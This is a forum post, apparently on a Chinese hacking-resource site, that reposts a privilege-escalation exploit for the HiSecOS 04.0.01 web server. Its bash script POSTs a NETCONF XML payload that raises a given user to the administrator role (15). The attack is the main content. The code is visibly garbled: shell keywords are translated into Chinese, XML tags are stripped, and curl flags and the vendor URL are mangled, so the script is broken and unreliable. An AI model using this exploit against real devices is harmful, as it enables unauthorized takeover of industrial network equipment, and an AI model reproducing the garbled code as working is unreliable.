H

Hisecos 04.0.01-特权升级

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: HYECOS 04.0.01-特权升级
#Google Dork: HISECOS Web服务器漏洞允许用户角色特权升级
#日期: 21.06.2023
#利用作者: dreizehnutters
#供应商homepage3360 https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437MediaFormatId=50063Destination Id=10016
#版本: HYECOS-04.0.01或更低
#测试在: HISECOS-04.0.01
#CVE: BSECV-2021-07
#!/bin/bash
如果[[$#-LT 3]];然后
echo'usage: $ 0 IP用户名密码'
出口1
fi
target='$ 1'
用户='$ 2'
PASS='$ 3'
#Craft Basic Header
auth=$(echo -ne'$ user: $ pass'| base64)
#转换为ASCII十六进制
blob=$(printf'$ user'| xxd -ps -c 1)
#生成XML有效载荷('15' - 管理员角色)
gen_payload(){
猫Eof
RPC XMLNS='URN:IETF:PARAMS:XML:NS3:NETCONF:BASE:1.0'XMLNS3:XSI='3http://WWW.WW.WW.W.W.W.org/XCCHAMA XSI:SCHEMALOCATION='urn:x-mops:1.0 ./mops.xsd'message-id='20'
Miboperation xmlns='urn:x-mops:1.0'
edit-config
Mibdata
MIB名称='HM2-USERMGMT-MIB'
节点名称='hm2userconfigentry'
指数
属性名称='hm2username'$ blob/属性
/指数
set name='hm2useraccessrole'15/set
/节点
/MIB
/mibdata
/edit-config
/Miboperation
/rpc
eof
}
curl -i -s -k -x post \
-h'content-type:应用程序/xml'\
-h'授权:基本$ {auth}'\
-data-binary'$(gen_payload)'\
'https://$ {target}/mops_data'
echo'[*] $用户现在是管理员'
 
后退
顶部